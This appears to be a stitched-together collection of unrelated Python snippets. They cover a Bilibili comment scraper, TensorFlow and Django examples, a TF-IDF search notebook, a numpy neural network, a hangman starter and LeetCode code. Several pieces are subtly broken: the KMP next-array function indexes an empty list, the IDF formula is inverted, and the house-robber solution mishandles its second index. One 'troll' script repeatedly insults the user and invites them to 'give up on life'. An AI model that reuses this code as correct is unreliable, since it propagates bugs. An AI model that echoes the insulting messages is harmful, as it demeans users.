url ="http://api.bilibili.com/x/v2/reply?jsonp=jsonp&;pn=1"+"&type=1&oid="+self.av
need = count
times = 0
num = 1
flag = True
answer = {}#{'来了来了': ['回复 @panda_face :df', '感谢老铁支持'], '想不出骚话': [], '百万后期,不得了': ['这么早就看了???']}
id_answer = {}
k = -1
dict_json = self.getdict(str(num), self.av,k)
while True:
if dict_json["code"] != 0:
k = k+1
dict_json = self.getdict(str(num), self.av, k)
else:
break
while dict_json["data"]["replies"] != None and flag:
for i in dict_json["data"]["replies"]:
if i["content"]["message"] not in answer.keys():
answer[i["content"]["message"]] = []
id_answer[i["content"]["message"]] = []
id_answer[i["content"]["message"]].append(i["mid"])
if i["replies"] !=None:
for j in i["replies"]:
answer[i["content"]["message"]].append(j["content"]["message"])
times += 1
if times == need:
flag =False
break
# print("第"+str(num)+"页下载成功")
num +=1
dict_json = self.getdict(str(num), self.av,k)
return answer
|
import tensorflow as tf
input_data = [1, 2, 3, 4, 5]
x = tf.placeholder(dtype=tf.float32)
y = x * 2
sess = tf.Session()
print(sess.run(y, feed_dict={x: input_data}))
a = tf.placeholder(dtype=tf.float32)
b = tf.placeholder(dtype=tf.float32)
z = tf.multiply(a, b)
print(sess.run(z, feed_dict={a: [[3, 2], [1, 2]], b: [[10], [20]]}))
c = tf.placeholder(dtype=tf.float32, shape=[None, 2])
d = tf.placeholder(dtype=tf.float32, shape=[None, 1])
z = tf.matmul(c, d)
print(sess.run(z, feed_dict={c: [[3, 2], [1, 3], [2, 4]], d: [[3], [1]]}))
|
from django.conf.urls.defaults import patterns, include, url
urlpatterns = patterns('articles.views',
url(r'^(?P<slug>[-\w]+)/$', 'detail', name='articles_detail'),
)
|
import numpy as np
from ..algo import score_bump
def test_score_bump():
x = 0
vals = [0, 0.5, 0.75, 0.875]
for i, item in enumerate(vals):
assert x == vals[i]
x = score_bump(x)
|
#W.A.P to troll you
while(1>0):
a=raw_input("Enter your gender(m/f) : ")
if a!='m':
print "YOU ARE A WASTE"
if a=='m':
a="males??"
print "Did you know that almost half of the world's population are",a
print""
print "This means that you are not as unique as you think..."
print"YOU ARE COMPLETELY WORTHLESS"
else:
print "YOU ARE A WASTE"
print "YOU ARE A WASTE"
print "YOU ARE A WASTE"
print "YOU ARE A WASTE"
print "YOU ARE A WASTE"
print "YOU ARE A WASTE"
print""
print"_______________________________________________"
a=input("Enter 1 to try again, 2 to give up on life : ")
if a!=1:
print" _____________"
print"|_____RIP_____|",exit()
|
# %%
# import NLP libraries
import spacy
from gensim.corpora.dictionary import Dictionary
# %%
# import utility and data libraries
import os
import re
import pandas as pd
import numpy as np
# %%
# load spacy model
nlp = spacy.load("en_core_web_md")
# %%
# load state of the union texts
def load_texts(dir_path):
"""
- Parameters: dir_path (string) for a directory containing text files.
- Returns: A list of dictionaries with keys file_name and text.
"""
docs = []
for file_name in os.listdir(dir_path):
file_path = os.path.join(dir_path, file_name)
if file_name.endswith(".txt") and os.path.isfile(file_path):
with open(file_path, "r+", encoding="utf-8") as file:
text = file.read()
current = {
"file_name": file_name,
"text": text
}
docs.append(current)
return docs
def add_sotu_metadata(sotu_doc_dict):
"""
- Parameters: sotu_doc_dict (dictionary) with sotu metadata.
Expects a file_name key in format "president_year.txt"
- Returns: A dictionary with appended president and year keys.
"""
file_name = sotu_doc_dict["file_name"]
pres, year, filetype = re.split(r"[^A-Za-z0-9]", file_name)
sotu_doc_dict["president"] = pres
sotu_doc_dict["year"] = int(year)
return sotu_doc_dict
def load_sotu_texts(dir_path):
"""
- Parameters: dir_path (string) for a directory containing text files.
Expects sotu text files in dir_path in format "president_year.txt".
- Returns: A Pandas DataFrame with file_name, text, president, and year
columns for each sotu text in dir_path.
"""
docs = load_texts(dir_path)
docs = [add_sotu_metadata(d) for d in docs]
docs = sorted(docs, key=lambda d: d["year"])
df = pd.DataFrame(docs)
return df[["year", "president", "text"]]
sotu_df = load_sotu_texts("data")
# %%
# simple boolean search
def search_df_texts(df, query_string: str):
"""
- Parameters: df (Pandas DataFrame), query_string (string). df must
contain a "text" column.
- Returns: A subset of df containing only rows where each term in
query_string appeared in df["text"].
"""
terms = query_string.lower().split(" ")
filters = [df["text"].str.lower().str.contains(term) for term in terms]
return df[np.all(filters, axis=0)]
search_term = "space rocket soviet"
results = search_df_texts(sotu_df, search_term)
print(f"Num results for query '{search_term}': {results.shape[0]}")
print(results.head())
# %%
# tokenize documents
def spacy_doc(model, text, lower=True):
"""
- Parameters: model (Spacy model), text (string), lower (bool).
- Returns: A Spacy Document object processed using the provided
model. Document is all lowercase if lower is True.
"""
if lower:
text = text.lower()
return model(text)
sotu_docs = [spacy_doc(nlp, text) for text in sotu_df["text"]]
# %%
# build dictionary
def get_token_texts(doc):
"""
- Parameters: doc (Spacy Document object).
- Returns: A list of strings based on the text value of each token
in doc.
"""
token_list = [token for token in doc]
return [token.text for token in token_list]
def build_dictionary(doc_list):
"""
- Parameters: doc_list (list of Spacy Document objects).
- Returns: A Gensim Dictionary, built using the tokens in each document
contained in doc_list.
"""
return Dictionary([get_token_texts(doc) for doc in doc_list])
sotu_dictionary = build_dictionary(sotu_docs)
# %%
# build bag-of-words model
def build_corpus(doc_list, dictionary):
"""
- Parameters: doc_list (list of Spacy Document objects), dictionary
(Gensim Dictionary object).
- Returns: A list of documents in bag-of-words format, containing tuples
with (token_id, token_count) for each token in the text.
"""
return [dictionary.doc2bow(get_token_texts(doc)) for doc in doc_list]
def build_td_matrix(doc_list, dictionary):
"""
- Parameters: doc_list (list of Spacy Document objects), dictionary
(Gensim Dictionary object).
- Returns: A term-document matrix in the form of a 2D NumPy Array, where
each row contains the count of a token in the corresponding document
and each column index is the id of a token in the dictionary.
"""
corpus = build_corpus(sotu_docs, sotu_dictionary)
tdm = []
for bow in corpus:
vector = np.zeros(len(dictionary))
for token_id, token_count in bow:
vector[token_id] = token_count
tdm.append(vector)
return np.array(tdm)
def build_term_document_df(doc_list, dictionary):
"""
- Parameters: doc_list (list of Spacy Document objects), dictionary
(Gensim Dictionary object).
- Returns a term-document matrix in the form of a Pandas Dataframe,
where each row is a document and each column is a token. Values in
the dataframe are token counts for the given document / token.
"""
tdm = build_td_matrix(doc_list, dictionary)
cols = list(dictionary.token2id.keys())
return pd.DataFrame(tdm, columns=cols, dtype=pd.Int64Dtype)
sotu_corpus = build_corpus(sotu_docs, sotu_dictionary)
sotu_tdm = build_td_matrix(sotu_docs, sotu_dictionary)
sotu_td_df = build_term_document_df(sotu_docs, sotu_dictionary)
# %%
# term-document frequency search based on the bag-of-words model
def search_td_df(td_df, text_df, query_string: str):
"""
- Parameters: td_df (Pandas DataFrame) representing a term-document matrix,
text_df (Pandas DataFrame) with a "text" column and rows that correspond
to the td_df, and query_string (string).
- Returns: A new dataframe that only contains rows from text_df where the
"text" column had at least one occurence of each term in query_string.
Additional columns are added to show the count of each term and the
total count of all terms.
"""
terms = query_string.lower().split(" ")
filters = [td_df[term] > 0 for term in terms]
filtered_td_df = td_df[np.all(filters, axis=0)][terms]
filtered_td_df["terms_sum"] = filtered_td_df.agg(sum, axis=1).astype("int64")
full_df = text_df.merge(filtered_td_df, left_index=True, right_index=True)
return full_df.sort_values("terms_sum", ascending=False)
search_td_df(sotu_td_df, sotu_df, search_term).head()
# %%
# build tf-idf model
def document_frequency(td_df, term: str):
"""
- Parameters: td_df (Pandas DataFrame) representing a term-document matrix,
and term (string).
- Returns: The document frequency value showing the number of documents in
td_df where term occurs at least once.
"""
return td_df[td_df[term] > 0].shape[0]
def inverse_document_frequency(td_df, term: str):
"""
- Parameters: td_df (Pandas DataFrame) representing a term-document matrix,
and term (string).
- Returns: The inverse document frequency value for term, calculated as
N / log(dft) where N is the number of documents in td_df and dft is the
document frequency value for term.
"""
N = td_df.shape[0]
dft = document_frequency(td_df, term)
return (N / np.log10(dft))
def build_tfidf_df(td_df):
"""
- Parameters: td_df (Pandas DataFrame) representing a term-document matrix.
- Returns: Returns a term frequency-inverse document frequency (TF-IDF)
matrix in the form of a Pandas DataFrame, where each row is a document and
each column is a token. Values in the dataframe are TF-IDF values for the
given document / token.
"""
def calculate_tfidf(col, td_df):
idf = inverse_document_frequency(td_df, col.name)
return col * idf
return td_df.apply(calculate_tfidf, td_df=td_df)
# %%
sotu_tfidf_df = build_tfidf_df(sotu_td_df)
# %%
# search based on the tf-idf model
def search_tfidf_df(tfidf_df, text_df, query_string: str):
"""
- Parameters: tfidf_df (Pandas DataFrame) representing a tf-idf matrix,
text_df (Pandas DataFrame) with a "text" column and rows that correspond
to the tfidf_df, and query_string (string).
- Returns: A new dataframe that only contains rows from text_df where the
corresponding tf-idf value was greater than zero for each of the terms
in query_string. Additional columns are added to show the tf-idf value
for each term and the sum of the tf-idf values.
"""
terms = query_string.lower().split(" ")
filters = [tfidf_df[term] > 0 for term in terms]
filtered_tfidf_df = tfidf_df[np.all(filters, axis=0)][terms]
filtered_tfidf_df["tfidf_sum"] = filtered_tfidf_df.agg(sum, axis=1)
full_df = text_df.merge(filtered_tfidf_df, left_index=True, right_index=True)
return full_df.sort_values("tfidf_sum", ascending=False)
search_tfidf_df(sotu_tfidf_df, sotu_df, search_term).head()
# %%
|
import torch
import torchaudio
import librosa
import csv
import ast
import warnings
from multiprocessing import cpu_count
from pathlib import Path
from utils.logger import get_logger
from utils.ipa_encoder import EOS_ID
logger = get_logger('asr.train')
warnings.filterwarnings('ignore')
class SpeechDataset(torch.utils.data.Dataset):
def __init__(self, data, sample_rate, mode='torchaudio'):
self.sample_rate = sample_rate
self.data = data
self.mode = mode
def __getitem__(self, idx):
filename, ids = self.data[idx]
if self.mode == 'librosa':
audio, _ = librosa.load(filename, self.sample_rate)
audio = torch.Tensor(audio)
elif self.mode == 'torchaudio':
audio, sr = torchaudio.load(filename)
if sr != self.sample_rate:
audio = torchaudio.transforms.Resample(sr, self.sample_rate)(audio)
audio.squeeze_()
return audio, torch.Tensor(ast.literal_eval(ids))
def __len__(self):
return len(self.data)
def get_collate_fn(max_len_src=None, max_len_tgt=None):
def collate_fn(batch):
nonlocal max_len_src, max_len_tgt
feature_lengths = torch.Tensor([audio.size(0) for audio, _ in batch])
if max_len_src is None:
max_len_src = feature_lengths.max().item()
target_lengths = torch.Tensor([ids.size(0) for _, ids in batch])
if max_len_tgt is None:
max_len_tgt = target_lengths.max().item()
features = torch.nn.utils.rnn.pad_sequence([audio for audio, _ in batch], batch_first=True)
targets = torch.nn.utils.rnn.pad_sequence([targets for _, targets in batch], batch_first=True,
padding_value=EOS_ID).to(torch.int64)
return features, feature_lengths, targets, target_lengths
return collate_fn
def get_loader(data, sample_rate, batch_size, shuffle,
max_len_src, max_len_tgt):
dataset = SpeechDataset(data, sample_rate)
loader = torch.utils.data.DataLoader(dataset, batch_size, shuffle,
collate_fn=get_collate_fn(max_len_src, max_len_tgt),
num_workers=cpu_count() - 1)
return loader
def load_dataset(data_path, subset='train'):
filename = str(Path(data_path) / f'{subset}.tsv')
logger.info(f'Reading data from {filename}')
dataset = []
with open(filename, 'r') as fid:
reader = csv.reader(fid, dialect='excel-tab')
for row in reader:
dataset.append(row)
return dataset
|
import logging
logger = logging.getLogger(__name__)
import django.forms as forms
from crispy_forms.helper import FormHelper
from crispy_forms.layout import (
Layout,
Fieldset,
Submit,
Div,
HTML,
Field,
Button
)
from models import Project, Category, Version, Entry
class ProjectForm(forms.ModelForm):
class Meta:
model = Project
def __init__(self, *args, **kwargs):
self.helper = FormHelper()
layout = Layout(
Fieldset(
'Project details',
Field('name', css_class="form-control"),
Field('image_file', css_class="form-control"),
css_id='project-form')
)
self.helper.layout = layout
self.helper.html5_required = False
super(ProjectForm, self).__init__(*args, **kwargs)
self.helper.add_input(Submit('submit', 'Submit'))
class CategoryForm(forms.ModelForm):
class Meta:
model = Category
def __init__(self, *args, **kwargs):
self.helper = FormHelper()
layout = Layout(
Fieldset(
'Category details',
Field('project', css_class="form-control"),
Field('name', css_class="form-control"),
Field('sort_number', css_class="form-control"),
css_id='project-form')
)
self.helper.layout = layout
self.helper.html5_required = False
super(CategoryForm, self).__init__(*args, **kwargs)
self.helper.add_input(Submit('submit', 'Submit'))
class VersionForm(forms.ModelForm):
class Meta:
model = Version
def __init__(self, *args, **kwargs):
self.helper = FormHelper()
layout = Layout(
Fieldset(
'Version details',
Field('project', css_class="form-control"),
Field('name', css_class="form-control"),
Field('description', css_class="form-control"),
Field('image_file', css_class="form-control"),
css_id='project-form')
)
self.helper.layout = layout
self.helper.html5_required = False
super(VersionForm, self).__init__(*args, **kwargs)
self.helper.add_input(Submit('submit', 'Submit'))
class EntryForm(forms.ModelForm):
class Meta:
model = Entry
def __init__(self, *args, **kwargs):
self.helper = FormHelper()
layout = Layout(
Fieldset(
'Entry details',
Field('version', css_class="form-control"),
Field('category', css_class="form-control"),
Field('title', css_class="form-control"),
Field('description', css_class="form-control"),
Field('image_file', css_class="form-control"),
Field('image_credits', css_class="form-control"),
css_id='entry-form')
)
self.helper.layout = layout
self.helper.html5_required = False
super(EntryForm, self).__init__(*args, **kwargs)
self.helper.add_input(Submit('submit', 'Submit'))
# Filter the category list when editing so it shows only relevent ones
if self.instance.id is not None:
self.fields['category'].queryset = Category.objects.filter(
project=self.instance.version.project)
|
try:
read_or_write = input("Haluatko lukea vai kirjoittaa vieraskirjaan? (l/k)\n")
if read_or_write == "l":
# avataan tiedosto
file_handle = open("guestbook.txt", "r", encoding='utf-8')
# haetaan tiedoston sisältö
content = file_handle.read()
# tehdään lista, erotetaan \n
lines = content.split("\n")
# luetaan rivi kerrallaan
for line in lines:
print(line)
# suljetaan tiedosto
file_handle.close()
elif read_or_write == "k":
# avataan tiedosto, a = append
file_handle = open("guestbook.txt", "a", encoding='utf-8')
# pyydetään kirjoitettava viesti
write_input = input("Kirjoita uusi viesti:\n")
# kirjoitetaan viesti tiedostoon, lisätään rivinvaihto
file_handle.write(write_input)
file_handle.write("\n")
print("Viesti tallennettu vieraskirjaan.")
# suljetaan tiedosto
file_handle.close()
else:
print("Väärä muoto!")
except ValueError:
print("Väärä muoto!")
|
import numpy as np
import matplotlib.pyplot as plt
class BPNN:
def __init__(self, nn_shape=[2, 4, 1]):
self.W = [] # 权重
self.B = [] # 阈值
self.O = [] # 各神经元节点输出
self.grads = [] # bp算法中误差与神经节点输入的微分(梯度项)
self.mean = np.zeros(nn_shape[2])
self.mean = self.mean.reshape((1, nn_shape[2]))
self.W_shape = []
self.B_shape = []
self.O_shape = []
self.grads_shape = []
self.errs = [] # 记录每次迭代的误差误差
for index in range(len(nn_shape) - 1): # 初始化W,B,O,grads矩阵
self.W.append(2 * np.random.random([nn_shape[index], nn_shape[index + 1]]) - 1)
self.W[index] = self.W[index].reshape([nn_shape[index], nn_shape[index + 1]])
self.W_shape.append(self.W[index].shape)
self.B.append(2 * np.random.random(nn_shape[index + 1]) - 1)
self.B[index] = self.B[index].reshape(1, nn_shape[index + 1])
self.B_shape.append(self.B[index].shape)
self.O.append(np.zeros(nn_shape[index + 1]))
self.O[index] = self.O[index].reshape(1, nn_shape[index + 1])
self.O_shape.append(self.O[index].shape)
self.grads.append(np.zeros(nn_shape[index + 1]))
self.grads[index] = self.grads[index].reshape(1, nn_shape[index + 1])
self.grads_shape.append(self.grads[index].shape)
self.y_hat = self.O[-1]
self.y_hat = self.y_hat.reshape(self.O[-1].shape)
print('建立{}层神经网络网络'.format(len(nn_shape)))
print(self.W_shape)
print(self.B_shape)
print(self.O_shape)
print(self.grads_shape)
def sigmoid(self, x):
return 1.0 / (1.0 + np.exp(-x))
def sigmoid_derivate(self, x):
return x * (1 - x)
def error(self, y, y_hat):
err = y - y_hat
return 0.5 * err.dot(err.T)
def cross_entropy(self, y, y_hat):
tmp = np.argwhere(y == 1)
return -np.log(y_hat[0, tmp[0, 1]])
def softmax(self, x):
exp_all = np.exp(x)
return exp_all / np.sum(exp_all)
def update_output(self, x, x_istest=False):
'''
更新各神经元的输出值,x为n*1向量
'''
if x_istest == True:
x = (x - self.mean) / self.var
for index in range(len(self.O)):
if index == 0:
self.O[index] = self.sigmoid(
x.dot(self.W[index]) + self.B[index])
elif index == len(self.O) - 1:
self.O[index] = self.softmax(
self.O[index - 1].dot(self.W[index]) + self.B[index])
else:
self.O[index] = self.sigmoid(
self.O[index - 1].dot(self.W[index]) + self.B[index])
self.O[index] = self.O[index].reshape(self.O_shape[index])
self.y_hat = self.O[-1]
self.y_hat = self.y_hat.reshape(self.O[-1].shape)
return self.y_hat
def update_grads(self, y):
'''
更新梯度值,y为p*1向量
'''
for index in range(len(self.grads) - 1, -1, -1):
if index == len(self.grads) - 1:
'''#该代码用来计算使用均方误差和sigmoid函数的二分类问题
self.grads[index] = self.sigmoid_derivate(
self.O[index]) * (y - self.O[index])
'''
tmp = np.argwhere(y == 1)
for index_g in range(self.grads[index].shape[1]):
if index_g == tmp[0, 1]:
self.grads[index][0, index_g] = 1 - self.O[index][0, index_g]
else:
self.grads[index][0, index_g] = - self.O[index][0, index_g]
else: # 链式法则计算隐含层梯度
self.grads[index] = self.sigmoid_derivate(
self.O[index]) * self.W[index + 1].dot(self.grads[index + 1].T).T
self.grads[index] = self.grads[index].reshape(
self.grads_shape[index])
def update_WB(self, x, learning_rate):
for index in range(len(self.W)):
if index == 0:
self.W[index] += learning_rate * x.T.dot(self.grads[index])
self.B[index] -= learning_rate * self.grads[index]
else:
self.W[index] += learning_rate * self.O[index - 1].T.dot(self.grads[index])
self.B[index] -= learning_rate * self.grads[index]
self.B[index] = self.B[index].reshape(self.B_shape[index])
def preprocess(self, X, method='centring'):
self.mean = np.mean(X, axis=0)
self.var = X.var()
X = (X - self.mean) / self.var
if method == 'centring':
return X
def fit(self, X, Y, Preprocess=True, method='centring', thre=0.03, learning_rate=0.001, max_iter=1000):
'''
将样本和label输入,X,Y中的样本均为行向量
'''
if Preprocess == True:
X = self.preprocess(X, method=method)
err = np.inf
count = 0
while err > thre:
err = 0
for index in range(X.shape[0]):
x = X[index, :].reshape((1, -1))
y = Y[index, :].reshape((1, -1))
self.update_output(x)
x = X[index, :].reshape((1, -1))
self.update_grads(y)
self.update_WB(x, learning_rate=learning_rate)
err += self.cross_entropy(y, self.y_hat)
err /= index + 1
self.errs.append(err)
count += 1
if count > max_iter:
print("超过最大迭代次数{}".format(max_iter))
break
print(count)
print(err)
def one_hot_label(self, Y):
'''
将label转化为0001形式,若label有3种,则转化为100,010,001
这里的label必须从0开始
'''
category = list(set(Y[:, 0]))
Y_ = np.zeros([Y.shape[0], len(category)])
for index in range(Y.shape[0]):
Y_[index, Y[index, 0]] = 1
return Y_
if __name__ == '__main__':
from sklearn.datasets import load_digits
digits = load_digits()
X = digits.data
Y = digits.target
X = X.reshape(X.shape)
Y = Y.reshape(Y.shape[0], 1)
bp = BPNN([64, 128, 64, 10]) #建立神经网络对象
Y = bp.one_hot_label(Y)
train_data = X[:1000, :]
train_label = Y[:1000, :]
test_data = X[1000:-1, :]
test_label = Y[1000:-1, :]
bp.fit(train_data, train_label, Preprocess=True,thre=0.01, learning_rate=0.005, max_iter=1000)#构建网络
count = 0
for i in range(test_data.shape[0]):
x = test_data[i].reshape(1, 64)
pre = bp.update_output(x, x_istest=True)
y = test_label[i].reshape(1, 10)
a = np.where(pre == np.max(pre))
b = np.where(y == np.max(y))
if a[1][0] == b[1][0]:
count += 1
print('准确率:{}'.format(count / test_label.shape[0]))
plt.plot(bp.errs)
plt.show()
|
from pandas import *
from ggplot import *
import pprint
import datetime
import itertools
import operator
import brewer2mpl
import ggplot as gg
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import pylab
import scipy.stats
import statsmodels.api as sm
#%matplotlib inline
#ggplot.colors.COLORS.extend(["#ff0000", "#00ff00", "#0000ff"])
def plot_weather_data(tw):
# plot=ggplot(aes(y='ENTRIESn_hourly',x='Hour'), data=tw) \
# +geom_point(color='lightblue')+stat_smooth(span=.15,color='black',se=True) \
# +xlab("Hour")+ylab("ENTRIESn_hourly")+ggtitle("T")
# plot=ggplot(aes(x='ENTRIESn_hourly'), data=tw)+geom_density() \
# +xlab("ENTRIESn_hourly")+ylab("Density")+ggtitle("T")
# plot=ggplot(tw,aes(x='EXITSn_hourly',y='ENTRIESn_hourly', color='rain')) \
# +geom_point()+xlab("X")+ylab("Y")+ggtitle("T")
# plot=ggplot(tw,aes(x='EXITSn_hourly', fill='ENTRIESn_hourly')) \
# +geom_density(alpha=0.25)+facet_wrap("grp")
# plot=ggplot(tw,aes(x='EXITSn_hourly', fill='grp'))+geom_density(alpha=0.25)
#ggsave(plot, "abc.png")
# return plot
df = turnstile_weather.copy()
#
df['datetime'] = df.loc[:,'DATEn'].map(lambda x: pandas.to_datetime(x))
df['dayofweek'] = df.loc[:,'datetime'].map(lambda x: x.strftime('%A'))
# print df['dayofweek']
# print df['ENTRIESn_hourly'].describe()
df['entries_log'] = np.log10(df['ENTRIESn_hourly'].fillna(0) + 1)
#plot = ggplot(turnstile_weather, aes('EXITSn_hourly', 'ENTRIESn_hourly')) \
# + stat_smooth(span=.15, color='black', se=True)+ geom_point(color='lightblue') \
# + ggtitle("MTA Entries By The Hour!") \
# + xlab('Exits') + ylab('Entries')
#plot = ggplot(df, aes('entries_log')) \
# + geom_histogram() \
# + facet_wrap('rain') \
# + ggtitle("Histogram log10(entries by hour). Rain No-Rain") \
# + xlab('Entries per hour') #+ ylab('Entries')
#df_group = df.groupby('dayofweek', as_index=False).sum()
#print df_group
#plot = ggplot(df_group, aes(x='dayofweek', y='ENTRIESn_hourly')) \
# + geom_bar(stat='bar') \
# + ggtitle("Entries by day of week") \
# + xlab('Day of week') + ylab('Entries') #+ scale_x_date(labels = date_format("%d"))
#df_group = df.groupby('Hour', as_index=False).sum()
#print df_group
#plot = ggplot(df_group, aes(x='Hour', y='ENTRIESn_hourly')) \
# + geom_bar(stat='bar') \
# + ggtitle("Entries by hour") \
# + xlab('Hour') + ylab('Entries') #+ scale_x_date(labels = date_format("%d"))
df_group = df.groupby(['Hour', 'rain'], as_index=False).median()
df_group.to_csv('dump.csv')
plot = ggplot(df_group, aes(x='Hour', y='ENTRIESn_hourly', color='rain')) \
+ geom_line() \
+ ggtitle("Entries median by hour of day, red=rain blue=no rain") \
+ xlab('Hour') + ylab('Median of ENTRIESn') \
+ scale_x_continuous(breaks=range(0,24,2))
# plot = df.describe()
return plot
if __name__ == "__main__":
image = "plot.png"
input_filename = 'C:/move - bwlee/Data Analysis/Nano/Intro to Data Science/project/code/turnstile_data_master_with_weather.csv'
# with open(image, "wb") as f:
turnstile_weather = pandas.read_csv(input_filename)
turnstile_weather['datetime']=turnstile_weather['DATEn']+' '+turnstile_weather['TIMEn']
gg=plot_weather_data(turnstile_weather)
print gg
# ggsave(f, gg)
|
class Solution:
def rob(self, nums: List[int]) -> int:
"""
https://leetcode.com/problems/house-robber/
"""
dp = [0 for i in range(len(nums))]
dp[0] = nums[0]
for i in range(1, len(nums)):
dp[i] = max(dp[i-1], dp[i-2]+nums[i])
return dp[-1]
|
# Generated by Django 2.0.5 on 2018-06-04 08:14
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import re
class Migration(migrations.Migration):
dependencies = [
('calculation', '0012_auto_20180604_0807'),
]
operations = [
migrations.AlterField(
model_name='menu',
name='dish',
field=models.ForeignKey(blank=True, default=None, on_delete=django.db.models.deletion.PROTECT, related_name='menu_dish', to='calculation.Dish', verbose_name='блюдо'),
),
migrations.AlterField(
model_name='menu',
name='food_intake',
field=models.PositiveIntegerField(choices=[(1, 'Завтрак'), (2, 'Обед'), (3, 'Полдник'), (4, '1-й ужин'), (5, '2-й ужин')], db_index=True, verbose_name='приём пищи'),
),
migrations.AlterField(
model_name='menu',
name='out',
field=models.CharField(blank=True, max_length=255, null=True, validators=[django.core.validators.RegexValidator(re.compile('^\\d+(?:\\,\\d+)*\\Z'), code='invalid', message='Enter only digits separated by commas.')], verbose_name='выход порции'),
),
]
|
from django.contrib import admin
from TestModel.models import myDevice, Task
# Register your models here.
admin.site.site_header = 'WELLCOME'
admin.site.site_title = 'WELLCOME'
class devicesDisplay(admin.ModelAdmin):
list_display = ('host_name', 'tag') # list
class tasksDisplay(admin.ModelAdmin):
list_display = ('id', 'name', 'progress', 'Owner', 'tag', 'status', 'm_time') # list
admin.site.register(myDevice, devicesDisplay)
admin.site.register(Task, tasksDisplay)
|
__author__ = 'luca'
from PyQt4.QtCore import *
from PyQt4.QtGui import QPixmap
class QAnalyzedFramesTimelineListModel(QAbstractListModel):
def __init__(self, video, discared_frames):
self.video = video
self._discared_frames = discared_frames
self.pixmaps = {}
super(QAnalyzedFramesTimelineListModel, self).__init__()
def rowCount(self, parent):
return self.video.frames_count()
def data(self, index, role):
if role == Qt.DisplayRole:
if not self.pixmaps.has_key(index.row()):
#Check if the frame is discared, if so create a blank pixmap
if int(index.row()) in self._discared_frames:
#Blank frame
pixmap = QPixmap(1, 1).scaled(self.video.width(), self.video.height())
pixmap.fill(Qt.black)
else:
frame = self.video.frames[index.row()]
pixmap = QPixmap(frame.path())#.scaled(200, 100, Qt.KeepAspectRatio)
self.pixmaps[index.row()] = pixmap
return self.pixmaps[index.row()]
else:
return QVariant()
|
num_set = {1, 2, 3, 4, 5}
print(1 in num_set)
print(8 in num_set)
|
import random
def read_words(filename='20k.txt'):
''' Read file of most popular english words'''
with open(filename) as words_file:
words = words_file.read()
words = [word for word in words.split('\n') if
len(word) > 5]
return words
def choose_random_word(words):
''' Choose random word from list '''
return random.choice(words)
print(choose_random_word(read_words()))
word = choose_random_word(read_words())
print(word)
guesses = 8
alfabetic = 'abcdefghijklmnopqrstuvwxyz'
print('Welcome to the game, Hangman!')
print('I am thinking of a word that is %d letters long.' % len(word))
print('____________')
print('You have %d guesses left' % guesses)
print(alfabetic)
|
def get_next(pattern):
'''
KMP算法的next数组的求法
'''
next = []
m, k, j = len(pattern), -1, 0
next[0] = -1
while j < m-1:
if k == -1 or pattern[j] == pattern[k]:
k += 1
j += 1
next[j] = k
else:
k = next[k]
|
from django.db import models
from django.urls import path
class TableField(models.Model):
model_id = models.IntegerField(primary_key=True, verbose_name='Порядковый номер')
name = models.CharField(max_length=64, verbose_name='Имя')
width = models.IntegerField(verbose_name='Ширина')
class CsvPath(models.Model):
csvPath = models.CharField(max_length=200, verbose_name='Путь к файлу')
class Meta:
verbose_name = 'Путь к файлу'
verbose_name_plural = 'Пути к файлам'
def get_path(self):
return self.csvPath
def set_path(self, new_path):
self.csvPath = new_path
self.save()
def save(self, *args, **kwargs):
obj = CsvPath.objects.all()
if obj.count() == 0 or self.pk == 1:
super(CsvPath, self).save(*args, **kwargs)
def __str__(self):
return path.basename(self.csvPath)
|
from django.urls import path
from .views import *
urlpatterns = [
path('messages/', list_of_messages, name='list_of_messages'),
path('messages/update/<int:pk>/', update_message, name='update_message'),
path('messages/updated_messages/', updated_messages, name='updated_messages'),
path('cancel_update_message/<int:pk>/', cancel_update_message, name='cancel_update_message'),
path('categories/', list_of_categories, name='list_of_categories'),
path('categories/add/', CategoryAddView. as_view(), name='categories_add'),
path('categories/delete/<int:pk>/', CategoryDeleteView. as_view(), name='categories_delete'),
path('categories/update/<int:pk>/', CategoryUpdateView. as_view(), name='categories_update'),
path('kinds/', list_of_kinds, name='list_of_kinds'),
path('kinds/add/', KindAddView. as_view(), name='kinds_add'),
path('kinds/delete/<int:pk>/', KindDeleteView. as_view(), name='kinds_delete'),
path('kinds/update/<int:pk>/', KindUpdateView. as_view(), name='kinds_update'),
path('list_of_products/', list_of_products, name='list_of_products'),
path('list_of_products/add/', ProductAddView. as_view(), name='product_add'),
path('list_of_products/delete/<int:pk>/', ProductDeleteView. as_view(), name='product_delete'),
path('list_of_products/update/<int:pk>/', ProductUpdateView. as_view(), name='product_update'),
]
|
from torch.utils.data import Dataset, DataLoader
import numpy as np
import json
from transformers import BertTokenizer
class myDataset(Dataset):
# x: 输入的句子序列 y:情感分类结果 mask:mask矩阵
def __init__(self, x, y, mask):
super(myDataset, self).__init__()
self.sample_num = x.shape[0]
self.x = x
self.y = y
self.mask = mask
def __getitem__(self, index):
return self.x[index], self.y[index], self.mask[index]
def __len__(self):
return self.sample_num
def DataProcess():
filename = 'data/test.json'
content_test,label_test = make_data_json(filename)
tokenizer = BertTokenizer.from_pretrained("bert-base-chinese")
test_tokenized = list(
map((lambda x: tokenizer.encode(x, add_special_tokens=True, max_length=512, truncation=True)), content_test))
test_padded = pad(test_tokenized)
test_attention_mask = np.where(test_padded != 0, 1, 0)
test_loader = DataLoader(dataset=myDataset(test_padded, label_test, test_attention_mask), batch_size=8)
print("Data processing done!")
return test_loader
def make_data_json(filename):
with open(filename, 'r') as f:
data_all = json.load(f)
content = []
label = []
if filename != 'data/test_data.json':
for data in data_all:
content.append(data['content'])
label.append(0)
return content, np.array(label)
def pad(tokenized):
max_len = 0
for i in tokenized:
if len(i) > max_len:
max_len = len(i)
max_len = min(max_len, 512)
padded = []
for i in tokenized:
if len(i) < max_len:
padded.append(i + [0] * (max_len - len(i)))
else:
padded.append(i[0: max_len])
return np.array(padded)
if __name__ == '__main__':
DataProcess()
|
def main():
print("This is the ops.py file.")
list = []
list = [1,2,3,4,5,6,7,8,9,10]
print("list = {}".format(list))
print("list[0] = {}".format(list[0]))
print("list[1] = {}".format(list[1]))
print("list[9] = {}".format(list[9]))
print("list[0:5] = {}".format(list[0:5]))
#list = range(0,100)
#print(list)
list[:] = range(0,100)
print(list)
# 3 possible arguments for slice
# 1 argument version
print("list[27] = {}".format(list[27]))
print("list[27:42] = {}".format(list[27:42]))
# Stepping across does not include '42' since slice is non-inclusive)
print("list[27:42:3] = {}".format(list[27:42:3]))
print("list[27:42:3] = [99,99,99,99,99]")
